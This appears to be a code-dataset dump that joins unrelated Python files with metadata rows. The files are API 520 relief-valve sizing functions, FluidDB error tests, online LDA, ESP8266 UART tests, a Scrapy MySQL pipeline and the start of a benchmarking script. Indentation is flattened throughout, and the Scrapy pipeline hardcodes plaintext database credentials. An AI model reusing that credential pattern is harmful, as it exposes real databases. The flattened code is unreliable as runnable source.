[1, 0.99, 0.94, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.95, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.95, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.95, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.95, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.9, 0.86, 0.82, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.91, 0.86, 0.82, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.92, 0.86, 0.82, 0.78, 0.75, 0.73, 0.7],
[1, 1, 0.97, 0.92, 0.87, 0.82, 0.79, 0.75, 0.73, 0.7],
[1, 1, 1, 0.95, 0.88, 0.83, 0.79, 0.76, 0.73, 0.7],
[1, 1, 1, 0.96, 0.89, 0.84, 0.78, 0.76, 0.73, 0.71],
[1, 1, 1, 0.97, 0.91, 0.85, 0.8, 0.77, 0.74, 0.71],
[1, 1, 1, 1, 0.93, 0.86, 0.81, 0.77, 0.74, 0.71],
[1, 1, 1, 1, 0.94, 0.86, 0.81, 0.77, 0.73, 0.7],
[1, 1, 1, 1, 0.95, 0.86, 0.8, 0.76, 0.72, 0.69],
[1, 1, 1, 1, 0.95, 0.85, 0.78, 0.73, 0.69, 0.66],
[1, 1, 1, 1, 1, 0.82, 0.74, 0.69, 0.65, 0.62]]
API520_KSH_tck = tck_interp2d_linear(_KSH_tempKs, _KSH_Pa, _KSH_factors)
def API520_SH(T1, P1):
r'''Calculates correction due to steam superheat for steam flow for use in
API 520 relief valve sizing. 2D interpolation among a table with 28
pressures and 10 temperatures is performed.
Parameters
----------
T1 : float
Temperature of the fluid entering the valve [K]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
Returns
-------
KSH : float
Correction due to steam superheat [-]
Notes
-----
For P above 20679 kPag, use the critical flow model.
Superheat cannot be above 649 degrees Celsius.
If T1 is below 149 degrees Celsius, a value of 1 is returned.
Examples
--------
Custom example from table 9:
>>> API520_SH(593+273.15, 1066.325E3)
0.7201800000000002
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
if P1 > 20780325.0: # 20679E3+atm
raise ValueError('For P above 20679 kPag, use the critical flow model')
if T1 > 922.15:
raise ValueError('Superheat cannot be above 649 degrees Celsius')
if T1 < 422.15:
return 1. # No superheat under 15 psig
return float(bisplev(T1, P1, API520_KSH_tck))
# Kw, for liquids. Applicable for all overpressures.
Kw_x = [15., 16.5493, 17.3367, 18.124, 18.8235, 19.5231, 20.1351, 20.8344,
21.4463, 22.0581, 22.9321, 23.5439, 24.1556, 24.7674, 25.0296, 25.6414,
26.2533, 26.8651, 27.7393, 28.3511, 28.9629, 29.6623, 29.9245, 30.5363,
31.2357, 31.8475, 32.7217, 33.3336, 34.0329, 34.6448, 34.8196, 35.4315,
36.1308, 36.7428, 37.7042, 38.3162, 39.0154, 39.7148, 40.3266, 40.9384,
41.6378, 42.7742, 43.386, 43.9978, 44.6098, 45.2216, 45.921, 46.5329,
47.7567, 48.3685, 49.0679, 49.6797, 50.]
Kw_y = [1, 0.996283, 0.992565, 0.987918, 0.982342, 0.976766, 0.97119, 0.964684,
0.958178, 0.951673, 0.942379, 0.935874, 0.928439, 0.921933, 0.919145,
0.912639, 0.906134, 0.899628, 0.891264, 0.884758, 0.878253, 0.871747,
0.868959, 0.862454, 0.855948, 0.849442, 0.841078, 0.834572, 0.828067,
0.821561, 0.819703, 0.814126, 0.806691, 0.801115, 0.790892, 0.785316,
0.777881, 0.771375, 0.76487, 0.758364, 0.751859, 0.740706, 0.734201,
0.727695, 0.722119, 0.715613, 0.709108, 0.702602, 0.69052, 0.684015,
0.677509, 0.671004, 0.666357]
def API520_W(Pset, Pback):
r'''Calculates capacity correction due to backpressure on balanced
spring-loaded PRVs in liquid service. For pilot operated valves,
this is always 1. Applicable up to 50% of the percent gauge backpressure,
For use in API 520 relief valve sizing. 1D interpolation among a table with
53 backpressures is performed.
Parameters
----------
Pset : float
Set pressure for relief [Pa]
Pback : float
Backpressure, [Pa]
Returns
-------
KW : float
Correction due to liquid backpressure [-]
Notes
-----
If the calculated gauge backpressure is less than 15%, a value of 1 is
returned.
Examples
--------
Custom example from figure 31:
>>> API520_W(1E6, 3E5) # 22% overpressure
0.9511471848008564
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
gauge_backpressure = (Pback-atm)/(Pset-atm)*100.0 # in percent
if gauge_backpressure < 15.0:
return 1.0
return interp(gauge_backpressure, Kw_x, Kw_y)
# Kb Backpressure correction factor, for gases
Kb_16_over_x = [37.6478, 38.1735, 38.6991, 39.2904, 39.8817, 40.4731, 40.9987,
41.59, 42.1156, 42.707, 43.2326, 43.8239, 44.4152, 44.9409,
45.5322, 46.0578, 46.6491, 47.2405, 47.7661, 48.3574, 48.883,
49.4744, 50.0]
Kb_16_over_y = [0.998106, 0.994318, 0.99053, 0.985795, 0.982008, 0.97822,
0.973485, 0.96875, 0.964962, 0.961174, 0.956439, 0.951705,
0.947917, 0.943182, 0.939394, 0.935606, 0.930871, 0.926136,
0.921402, 0.918561, 0.913826, 0.910038, 0.90625]
Kb_10_over_x = [30.0263, 30.6176, 31.1432, 31.6689, 32.1945, 32.6544, 33.18,
33.7057, 34.1656, 34.6255, 35.0854, 35.5453, 36.0053, 36.4652,
36.9251, 37.385, 37.8449, 38.2392, 38.6334, 39.0276, 39.4875,
39.9474, 40.4074, 40.8016, 41.1958, 41.59, 42.0499, 42.4442,
42.8384, 43.2326, 43.6925, 44.0867, 44.4809, 44.8752, 45.2694,
45.6636, 46.0578, 46.452, 46.8463, 47.2405, 47.6347, 48.0289,
48.4231, 48.883, 49.2773, 49.6715]
Kb_10_over_y = [0.998106, 0.995265, 0.99053, 0.985795, 0.981061, 0.975379,
0.969697, 0.963068, 0.957386, 0.950758, 0.945076, 0.938447,
0.930871, 0.925189, 0.918561, 0.910985, 0.904356, 0.897727,
0.891098, 0.883523, 0.876894, 0.870265, 0.862689, 0.856061,
0.848485, 0.840909, 0.83428, 0.827652, 0.820076, 0.8125,
0.805871, 0.798295, 0.79072, 0.783144, 0.775568, 0.768939,
0.762311, 0.754735, 0.747159, 0.739583, 0.732008, 0.724432,
0.716856, 0.70928, 0.701705, 0.695076]
def API520_B(Pset, Pback, overpressure=0.1):
r'''Calculates capacity correction due to backpressure on balanced
spring-loaded PRVs in vapor service. For pilot operated valves,
this is always 1. Applicable up to 50% of the percent gauge backpressure,
For use in API 520 relief valve sizing. 1D interpolation among tables of
backpressure correction factors (46 points for 10% overpressure, 23 points
for 16% overpressure) is performed.
Parameters
----------
Pset : float
Set pressure for relief [Pa]
Pback : float
Backpressure, [Pa]
overpressure : float, optional
The maximum fraction overpressure; one of 0.1, 0.16, or 0.21, [-]
Returns
-------
Kb : float
Correction due to vapor backpressure [-]
Notes
-----
If the calculated gauge backpressure is less than 30%, 38%, or 50% for
overpressures of 0.1, 0.16, or 0.21, a value of 1 is returned.
Percent gauge backpressure must be under 50%.
Examples
--------
Custom examples from figure 30:
>>> API520_B(1E6, 5E5)
0.7929945420944432
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
gauge_backpressure = (Pback-atm)/(Pset-atm)*100.0 # in percent
if overpressure not in (0.1, 0.16, 0.21):
raise ValueError('Only overpressures of 10%, 16%, or 21% are permitted')
if (overpressure == 0.1 and gauge_backpressure < 30.0) or (
overpressure == 0.16 and gauge_backpressure < 38.0) or (
overpressure == 0.21 and gauge_backpressure < 50.0):
return 1.0
elif gauge_backpressure > 50.0:
raise ValueError('Gauge pressure must be < 50%')
if overpressure == 0.16:
Kb = interp(gauge_backpressure, Kb_16_over_x, Kb_16_over_y)
elif overpressure == 0.1:
Kb = interp(gauge_backpressure, Kb_10_over_x, Kb_10_over_y)
return Kb
def API520_A_g(m, T, Z, MW, k, P1, P2=101325, Kd=0.975, Kb=1, Kc=1):
r'''Calculates required relief valve area for an API 520 valve passing
a gas or a vapor, at either critical or sub-critical flow.
For critical flow:
.. math::
A = \frac{m}{CK_dP_1K_bK_c}\sqrt{\frac{TZ}{M}}
For sub-critical flow:
.. math::
A = \frac{17.9m}{F_2K_dK_c}\sqrt{\frac{TZ}{MP_1(P_1-P_2)}}
Parameters
----------
m : float
Mass flow rate of vapor through the valve, [kg/s]
T : float
Temperature of vapor entering the valve, [K]
Z : float
Compressibility factor of the vapor, [-]
MW : float
Molecular weight of the vapor, [g/mol]
k : float
Isentropic coefficient or ideal gas heat capacity ratio [-]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
P2 : float, optional
Built-up backpressure; the increase in pressure during flow at the
outlet of a pressure-relief device after it opens, [Pa]
Kd : float, optional
The effective coefficient of discharge, from the manufacturer or for
preliminary sizing, using 0.975 normally or 0.62 when used with a
rupture disc as described in [1]_, []
Kb : float, optional
Correction due to vapor backpressure [-]
Kc : float, optional
Combination correction factor for installation with a rupture disk
upstream of the PRV, []
Returns
-------
A : float
Minimum area for relief valve according to [1]_, [m^2]
Notes
-----
Units are internally kg/hr, kPa, and mm^2 to match [1]_.
Examples
--------
Example 1 from [1]_ for critical flow, matches:
>>> API520_A_g(m=24270/3600., T=348., Z=0.90, MW=51., k=1.11, P1=670E3, Kb=1, Kc=1)
0.0036990460646834414
Example 2 from [1]_ for sub-critical flow, matches:
>>> API520_A_g(m=24270/3600., T=348., Z=0.90, MW=51., k=1.11, P1=670E3, P2=532E3, Kd=0.975, Kb=1, Kc=1)
0.004248358775943481
The mass flux in (kg/(s*m^2)) can be found by dividing the specified mass
flow by the calculated area:
>>> (24270/3600.)/API520_A_g(m=24270/3600., T=348., Z=0.90, MW=51., k=1.11, P1=670E3, Kb=1, Kc=1)
1822.541960488834
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
P1, P2 = P1/1000., P2/1000. # Pa to Kpa in the standard
m = m*3600. # kg/s to kg/hr
if is_critical_flow(P1, P2, k):
C = API520_C(k)
A = m/(C*Kd*Kb*Kc*P1)*sqrt(T*Z/MW)
else:
F2 = API520_F2(k, P1, P2)
A = 17.9*m/(F2*Kd*Kc)*sqrt(T*Z/(MW*P1*(P1-P2)))
return A*0.001**2 # convert mm^2 to m^2
def API520_A_steam(m, T, P1, Kd=0.975, Kb=1, Kc=1):
r'''Calculates required relief valve area for an API 520 valve passing
    steam, at either saturation or superheat, but not partially condensed.
.. math::
A = \frac{190.5m}{P_1 K_d K_b K_c K_N K_{SH}}
Parameters
----------
m : float
Mass flow rate of steam through the valve, [kg/s]
T : float
Temperature of steam entering the valve, [K]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
Kd : float, optional
The effective coefficient of discharge, from the manufacturer or for
preliminary sizing, using 0.975 normally or 0.62 when used with a
rupture disc as described in [1]_, []
Kb : float, optional
Correction due to vapor backpressure [-]
Kc : float, optional
Combination correction factor for installation with a rupture disk
upstream of the PRV, []
Returns
-------
A : float
Minimum area for relief valve according to [1]_, [m^2]
Notes
-----
    Units are internally kg/hr, kPa, and mm^2 to match [1]_.
With the provided temperature and pressure, the KN coefficient is
calculated with the function API520_N; as is the superheat correction KSH,
with the function API520_SH.
Examples
--------
Example 4 from [1]_, matches:
>>> API520_A_steam(m=69615/3600., T=592.5, P1=12236E3, Kd=0.975, Kb=1, Kc=1)
0.0011034712423692733
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
KN = API520_N(P1)
KSH = API520_SH(T, P1)
P1 = P1/1000. # Pa to kPa
m = m*3600. # kg/s to kg/hr
A = 190.5*m/(P1*Kd*Kb*Kc*KN*KSH)
return A*0.001**2 # convert mm^2 to m^2
|
mit
| -2,173,164,278,899,110,400
| 32.722467
| 107
| 0.610886
| false
| 2.785324
| false
| false
| false
|
fluidinfo/fom
|
tests/test_errors.py
|
1
|
2470
|
import unittest
from fom.api import FluidApi
from fom.errors import (
Fluid400Error,
Fluid401Error,
Fluid404Error,
Fluid406Error,
Fluid412Error,
Fluid413Error,
Fluid500Error,
)
from _base import FakeFluidDB
class ErrorTest(unittest.TestCase):
def setUp(self):
self.db = FakeFluidDB()
self.api = FluidApi(self.db)
def test400(self):
self.db.add_resp(400, 'application/json', 'Not Found')
self.assertRaises(Fluid400Error,
self.api.namespaces['test'].delete)
def test401(self):
self.db.add_resp(401, 'text/plain', 'Unauthorized')
self.assertRaises(Fluid401Error,
self.api.namespaces['test'].delete)
def test404(self):
self.db.add_resp(404, 'text/plain', 'Not Found')
self.assertRaises(Fluid404Error,
self.api.namespaces['test'].delete)
def test406(self):
self.db.add_resp(406, 'text/plain', 'Not Acceptable')
self.assertRaises(Fluid406Error,
self.api.namespaces['test'].delete)
def test412(self):
self.db.add_resp(412, 'text/plain', 'Precondition Failed')
self.assertRaises(Fluid412Error,
self.api.namespaces['test'].delete)
def test413(self):
self.db.add_resp(413, 'text/plain', 'Request Entity Too Large')
self.assertRaises(Fluid413Error,
self.api.namespaces['test'].delete)
def test500(self):
self.db.add_resp(500, 'text/plain', 'Internal Server Error')
self.assertRaises(Fluid500Error,
self.api.namespaces['test'].delete)
def testErrorObject(self):
"""
Ensures that the exception object has the correct attributes.
"""
class FakeResponse(object):
"""
Mock class.
"""
def __init__(self, status, error, request_id):
self.status = status
self.error = error
self.request_id = request_id
fake_response = FakeResponse('500', 'Server Error', '12345')
err = Fluid500Error(fake_response)
self.assertEqual('500', err.status)
self.assertEqual('Server Error', err.fluid_error)
self.assertEqual('12345', err.request_id)
self.assertEqual(fake_response, err.response)
if __name__ == '__main__':
unittest.main()
|
mit
| 6,300,827,892,538,906,000
| 28.759036
| 71
| 0.583401
| false
| 3.939394
| true
| false
| false
|
rueckstiess/jiratopic
|
onlineldavb/onlineldavb.py
|
1
|
11963
|
# onlineldavb.py: Package of functions for fitting Latent Dirichlet
# Allocation (LDA) with online variational Bayes (VB).
#
# Copyright (C) 2010 Matthew D. Hoffman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, re, time, string
import numpy as n
from scipy.special import gammaln, psi
n.random.seed(100000001)
meanchangethresh = 0.001
def dirichlet_expectation(alpha):
"""
For a vector theta ~ Dir(alpha), computes E[log(theta)] given alpha.
"""
if (len(alpha.shape) == 1):
return(psi(alpha) - psi(n.sum(alpha)))
return(psi(alpha) - psi(n.sum(alpha, 1))[:, n.newaxis])
def parse_doc_list(docs, vocab):
"""
Parse a document into a list of word ids and a list of counts,
or parse a set of documents into two lists of lists of word ids
and counts.
Arguments:
docs: List of D documents. Each document must be represented as
a single string. (Word order is unimportant.) Any
words not in the vocabulary will be ignored.
vocab: Dictionary mapping from words to integer ids.
Returns a pair of lists of lists.
The first, wordids, says what vocabulary tokens are present in
each document. wordids[i][j] gives the jth unique token present in
document i. (Don't count on these tokens being in any particular
order.)
The second, wordcts, says how many times each vocabulary token is
present. wordcts[i][j] is the number of times that the token given
by wordids[i][j] appears in document i.
"""
if (type(docs).__name__ == 'str'):
temp = list()
temp.append(docs)
docs = temp
D = len(docs)
wordids = list()
wordcts = list()
for d in range(0, D):
docs[d] = docs[d].lower()
docs[d] = re.sub(r'-', ' ', docs[d])
docs[d] = re.sub(r'[^a-z ]', '', docs[d])
docs[d] = re.sub(r' +', ' ', docs[d])
words = string.split(docs[d])
ddict = dict()
for word in words:
if (word in vocab):
wordtoken = vocab[word]
if (not wordtoken in ddict):
ddict[wordtoken] = 0
ddict[wordtoken] += 1
wordids.append(ddict.keys())
wordcts.append(ddict.values())
return((wordids, wordcts))
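# Illustrative example (values assumed, not taken from the original code): with
# vocab = {'online': 0, 'lda': 1}, parse_doc_list(['online lda online'], vocab)
# returns wordids = [[0, 1]] and wordcts = [[2, 1]]; the order of the unique
# token ids within a document is not guaranteed.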
class OnlineLDA:
"""
Implements online VB for LDA as described in (Hoffman et al. 2010).
"""
def __init__(self, vocab, K, D, alpha, eta, tau0, kappa, init_lambda=None):
"""
Arguments:
K: Number of topics
vocab: A set of words to recognize. When analyzing documents, any word
not in this set will be ignored.
D: Total number of documents in the population. For a fixed corpus,
this is the size of the corpus. In the truly online setting, this
can be an estimate of the maximum number of documents that
could ever be seen.
alpha: Hyperparameter for prior on weight vectors theta
eta: Hyperparameter for prior on topics beta
tau0: A (positive) learning parameter that downweights early iterations
kappa: Learning rate: exponential decay rate---should be between
(0.5, 1.0] to guarantee asymptotic convergence.
Note that if you pass the same set of D documents in every time and
set kappa=0 this class can also be used to do batch VB.
"""
self._vocab = dict()
for word in vocab:
word = word.lower()
word = re.sub(r'[^a-z]', '', word)
self._vocab[word] = len(self._vocab)
self._K = K
self._W = len(self._vocab)
self._D = D
self._alpha = alpha
self._eta = eta
self._tau0 = tau0 + 1
self._kappa = kappa
self._updatect = 0
# Initialize the variational distribution q(beta|lambda)
        if init_lambda is not None:
self._lambda = init_lambda
else:
self._lambda = 1*n.random.gamma(100., 1./100., (self._K, self._W))
self._Elogbeta = dirichlet_expectation(self._lambda)
self._expElogbeta = n.exp(self._Elogbeta)
def do_e_step(self, docs):
"""
Given a mini-batch of documents, estimates the parameters
gamma controlling the variational distribution over the topic
weights for each document in the mini-batch.
Arguments:
docs: List of D documents. Each document must be represented
as a string. (Word order is unimportant.) Any
words not in the vocabulary will be ignored.
Returns a tuple containing the estimated values of gamma,
as well as sufficient statistics needed to update lambda.
"""
# This is to handle the case where someone just hands us a single
# document, not in a list.
        if (type(docs).__name__ == 'str'):
temp = list()
temp.append(docs)
docs = temp
(wordids, wordcts) = parse_doc_list(docs, self._vocab)
batchD = len(docs)
# Initialize the variational distribution q(theta|gamma) for
# the mini-batch
gamma = 1*n.random.gamma(100., 1./100., (batchD, self._K))
Elogtheta = dirichlet_expectation(gamma)
expElogtheta = n.exp(Elogtheta)
sstats = n.zeros(self._lambda.shape)
# Now, for each document d update that document's gamma and phi
it = 0
meanchange = 0
for d in range(0, batchD):
# These are mostly just shorthand (but might help cache locality)
ids = wordids[d]
cts = wordcts[d]
gammad = gamma[d, :]
Elogthetad = Elogtheta[d, :]
expElogthetad = expElogtheta[d, :]
expElogbetad = self._expElogbeta[:, ids]
# The optimal phi_{dwk} is proportional to
# expElogthetad_k * expElogbetad_w. phinorm is the normalizer.
phinorm = n.dot(expElogthetad, expElogbetad) + 1e-100
# Iterate between gamma and phi until convergence
for it in range(0, 100):
lastgamma = gammad
# We represent phi implicitly to save memory and time.
# Substituting the value of the optimal phi back into
# the update for gamma gives this update. Cf. Lee&Seung 2001.
gammad = self._alpha + expElogthetad * \
n.dot(cts / phinorm, expElogbetad.T)
Elogthetad = dirichlet_expectation(gammad)
expElogthetad = n.exp(Elogthetad)
phinorm = n.dot(expElogthetad, expElogbetad) + 1e-100
# If gamma hasn't changed much, we're done.
meanchange = n.mean(abs(gammad - lastgamma))
if (meanchange < meanchangethresh):
break
gamma[d, :] = gammad
# Contribution of document d to the expected sufficient
# statistics for the M step.
sstats[:, ids] += n.outer(expElogthetad.T, cts/phinorm)
# This step finishes computing the sufficient statistics for the
# M step, so that
# sstats[k, w] = \sum_d n_{dw} * phi_{dwk}
# = \sum_d n_{dw} * exp{Elogtheta_{dk} + Elogbeta_{kw}} / phinorm_{dw}.
sstats = sstats * self._expElogbeta
return((gamma, sstats))
def update_lambda(self, docs):
"""
First does an E step on the mini-batch given in wordids and
wordcts, then uses the result of that E step to update the
variational parameter matrix lambda.
Arguments:
docs: List of D documents. Each document must be represented
as a string. (Word order is unimportant.) Any
words not in the vocabulary will be ignored.
Returns gamma, the parameters to the variational distribution
over the topic weights theta for the documents analyzed in this
update.
Also returns an estimate of the variational bound for the
entire corpus for the OLD setting of lambda based on the
documents passed in. This can be used as a (possibly very
noisy) estimate of held-out likelihood.
"""
# rhot will be between 0 and 1, and says how much to weight
# the information we got from this mini-batch.
rhot = pow(self._tau0 + self._updatect, -self._kappa)
self._rhot = rhot
# Do an E step to update gamma, phi | lambda for this
# mini-batch. This also returns the information about phi that
# we need to update lambda.
(gamma, sstats) = self.do_e_step(docs)
# Estimate held-out likelihood for current values of lambda.
bound = self.approx_bound(docs, gamma)
# Update lambda based on documents.
self._lambda = self._lambda * (1-rhot) + \
rhot * (self._eta + self._D * sstats / len(docs))
self._Elogbeta = dirichlet_expectation(self._lambda)
self._expElogbeta = n.exp(self._Elogbeta)
self._updatect += 1
return(gamma, bound)
def approx_bound(self, docs, gamma):
"""
Estimates the variational bound over *all documents* using only
the documents passed in as "docs." gamma is the set of parameters
to the variational distribution q(theta) corresponding to the
set of documents passed in.
The output of this function is going to be noisy, but can be
useful for assessing convergence.
"""
# This is to handle the case where someone just hands us a single
# document, not in a list.
        if (type(docs).__name__ == 'str'):
temp = list()
temp.append(docs)
docs = temp
(wordids, wordcts) = parse_doc_list(docs, self._vocab)
batchD = len(docs)
score = 0
Elogtheta = dirichlet_expectation(gamma)
expElogtheta = n.exp(Elogtheta)
# E[log p(docs | theta, beta)]
for d in range(0, batchD):
gammad = gamma[d, :]
ids = wordids[d]
cts = n.array(wordcts[d])
phinorm = n.zeros(len(ids))
for i in range(0, len(ids)):
temp = Elogtheta[d, :] + self._Elogbeta[:, ids[i]]
tmax = max(temp)
phinorm[i] = n.log(sum(n.exp(temp - tmax))) + tmax
score += n.sum(cts * phinorm)
# oldphinorm = phinorm
# phinorm = n.dot(expElogtheta[d, :], self._expElogbeta[:, ids])
# print oldphinorm
# print n.log(phinorm)
# score += n.sum(cts * n.log(phinorm))
# E[log p(theta | alpha) - log q(theta | gamma)]
score += n.sum((self._alpha - gamma)*Elogtheta)
score += n.sum(gammaln(gamma) - gammaln(self._alpha))
score += sum(gammaln(self._alpha*self._K) - gammaln(n.sum(gamma, 1)))
# Compensate for the subsampling of the population of documents
score = score * self._D / len(docs)
# E[log p(beta | eta) - log q (beta | lambda)]
score = score + n.sum((self._eta-self._lambda)*self._Elogbeta)
score = score + n.sum(gammaln(self._lambda) - gammaln(self._eta))
score = score + n.sum(gammaln(self._eta*self._W) -
gammaln(n.sum(self._lambda, 1)))
return(score)
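# A hedged usage sketch (not part of the original package): how OnlineLDA can
# be driven with mini-batches. The tiny vocabulary, documents and
# hyperparameter values below are illustrative assumptions only.
if __name__ == '__main__':
    example_vocab = ['online', 'variational', 'bayes', 'topic', 'model']
    example_docs = ['online variational bayes', 'topic model topic model']
    olda = OnlineLDA(example_vocab, K=2, D=100, alpha=0.5, eta=0.5,
                     tau0=1024., kappa=0.7)
    for iteration in range(5):
        gamma, bound = olda.update_lambda(example_docs)
        print 'iteration %d: held-out bound estimate %f' % (iteration, bound)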
|
apache-2.0
| 4,364,099,052,186,242,600
| 38.481848
| 79
| 0.593413
| false
| 3.807447
| false
| false
| false
|
kfricke/micropython-esp8266uart
|
test_esp8266uart.py
|
1
|
2523
|
import esp8266uart
esp = esp8266uart.ESP8266(1, 115200)
print('Testing generic methods')
print('=======================')
print('AT startup...')
if esp.test():
print('Success!')
else:
print('Failed!')
#print('Soft-Reset...')
#if esp.reset():
# print('Success!')
#else:
# print('Failed!')
print('Another AT startup...')
if esp.test():
print('Success!')
else:
print('Failed!')
print()
print('Testing WIFI methods')
print('====================')
wifi_mode = 1
print("Testing get_mode/set_mode of value '%s'(%i)..." % (esp8266uart.WIFI_MODES[wifi_mode], wifi_mode))
esp.set_mode(wifi_mode)
if esp.get_mode() == wifi_mode:
print('Success!')
else:
print('Failed!')
print('Disconnecting from WLAN...')
if esp.disconnect():
print('Success!')
else:
print('Failed!')
print('Disconnecting from WLAN again...')
if esp.disconnect():
print('Success!')
else:
print('Failed!')
print('Checking if not connected WLAN...')
if esp.get_accesspoint() == None:
print('Success!')
else:
print('Failed!')
print('Scanning for WLANs...')
wlans = esp.list_all_accesspoints()
for wlan in wlans:
print(wlan)
print("Scanning for WLAN '%s'..." % (wlan['ssid']))
for wlan2 in esp.list_accesspoints(wlan['ssid']):
print(wlan2)
print('Setting access point mode...')
if esp.set_mode(esp8266uart.WIFI_MODES['Access Point + Station']):
print('Failed!')
else:
print('Success!')
print('Reading access point configuration')
print(esp.get_accesspoint_config())
print('Listing all stations connected to the module in access point mode...')
print(esp.list_stations())
print('Checking DHCP client and server settings...')
for mode in range(3):
print(esp.set_dhcp_config(mode, 0))
print(esp.set_dhcp_config(mode, 1))
print(esp.set_dhcp_config(mode, True))
print(esp.set_dhcp_config(mode, False))
try:
print(esp.set_dhcp_config(0, 2))
except esp8266uart.CommandError:
print('Obvious error caught!')
try:
print(esp.set_dhcp_config(4, 1))
except esp8266uart.CommandError:
print('Obvious error caught!')
print('Setting autoconnect to access point in station mode...')
esp.set_autoconnect(True)
esp.set_autoconnect(False)
esp.set_autoconnect(True)
print('Reading and setting the station IP...')
print(esp.get_station_ip())
esp.set_station_ip('192.168.1.10')
print(esp.get_station_ip())
print('Reading and setting the access point IP...')
print(esp.get_accesspoint_ip())
esp.set_accesspoint_ip('192.168.1.1')
print(esp.get_accesspoint_ip())
|
mit
| -2,034,658,239,474,637,800
| 23.269231
| 104
| 0.663892
| false
| 3.02518
| true
| false
| false
|
Sudy/ScrapyJD
|
ScrapyJdAzw/pipelines.py
|
1
|
2146
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
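# For example, a hypothetical settings.py entry enabling this pipeline could be:
# ITEM_PIPELINES = {'ScrapyJdAzw.pipelines.ScrapyjdazwPipeline': 300}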
from scrapy import log
#from scrapy.core.exceptions import DropItem
from twisted.enterprise import adbapi
import time
import MySQLdb.cursors
class ScrapyjdazwPipeline(object):
def __init__(self):
# @@@ hardcoded db settings
# TODO: make settings configurable through settings
self.dbpool = adbapi.ConnectionPool('MySQLdb',
            host='192.168.1.153',
db='jddata',
user='spider',
passwd='spider1234',
cursorclass=MySQLdb.cursors.DictCursor,
charset='utf8',
use_unicode=True
)
def process_item(self, item, spider):
# run db query in thread pool
if item.has_key("pinfo"):
result = ""
for it in item["pinfo"]:
result += it.strip()
item["pinfo"] = result
query = self.dbpool.runInteraction(self._conditional_insert, item)
query.addErrback(self.handle_error)
return item
def _conditional_insert(self, tx, item):
# create record if doesn't exist.
# all this block run on it's own thread
if item.has_key("pinfo"):
tx.execute(\
"insert into product_table (pro_id, pro_info, pro_price) "
"values (%s, %s, %s)",
( item['proid'],
item['pinfo'],
item['pricejd'],
)
)
else:
tx.execute(\
"insert into comment_table (pro_id, user, time, score, comment) "
"values (%s, %s, %s, %s, %s)",
( item['proid'],
item['user'],
item['time'],
item['score'],
item['comment'],
)
)
log.msg("Item stored in db: %s" % item["proid"], level=log.INFO)
def handle_error(self, e):
log.err(e)
|
mit
| -3,673,628,681,913,933,000
| 30.573529
| 81
| 0.503728
| false
| 4.207843
| false
| false
| false
|
gsauthof/utility
|
benchmark.py
|
1
|
11990
|
#!/usr/bin/env python3
# 2016, Georg Sauthoff <mail@georg.so>, GPLv3+
import argparse
import collections
import csv
import datetime
import itertools
import logging
# importing it conditionally iff svg generation is selected
# otherwise, it may fail on a system with minimal matplotlib
# install, i.e. where one of the backends loaded by default
# throws
#import matplotlib.pyplot as plt
# importing it conditionally iff csv or not quiet
#import numpy as np
import os
import subprocess
import sys
import tempfile
import time
try:
import colorlog
have_colorlog = True
except ImportError:
have_colorlog = False
def mk_arg_parser():
p = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='run command multiple times and gather stats',
epilog='''Examples:
Run 3 programs 20 times each and write stats to stdout and the raw
data to a file:
$ benchmark --cmd ./find_memchr ./find_find --raw raw.dat -n 20 \\
./find_unroll2 3000 in
Create boxplot SVG (and nicely format the stdout and also write
the stats to a CSV file):
$ benchmark --input raw.dat --svg rss.svg --csv rss.csv \\
| column -t -s, -o ' | '
In case the benchmarked program needs some options the `--` delimiter
has its usual meaning (also explicitly specifiying a tag):
$ benchmark --tags mode2 -n 1000 -- ./find_unroll2 --mode 2
# 2016, Georg Sauthoff <mail@georg.so>, GPLv3+
'''
)
p.add_argument('argv', nargs='*', help='ARG0.. of the child')
p.add_argument('--cmd', '--cmds', nargs='+', default=[],
help='extra commands to run')
p.add_argument('--cols', nargs='+', default=[1,2,3,4],
help='columns to generate stats for')
p.add_argument('--csv', nargs='?', const='benchmark.csv',
help='also write results as csv')
p.add_argument('--debug', nargs='?', metavar='FILE',
const='benchmark.log', help='log debug messages into file')
p.add_argument('--graph-item', help='item to plot in a graph')
p.add_argument('--height', type=float, help='height of the graph (inch)')
p.add_argument('--input', '-i', metavar='FILE',
help='include raw data from a previous run')
p.add_argument('--items', nargs='+', default=['wall', 'user', 'sys', 'rss'],
help='names for the selected columns')
p.add_argument('--null-out', type=bool, default=True,
help='redirect stdout to /dev/null')
p.add_argument('--pstat', action=InitPstat,
help='set options for `perf stat` instead of GNU time')
p.add_argument('--precision', type=int, default=3,
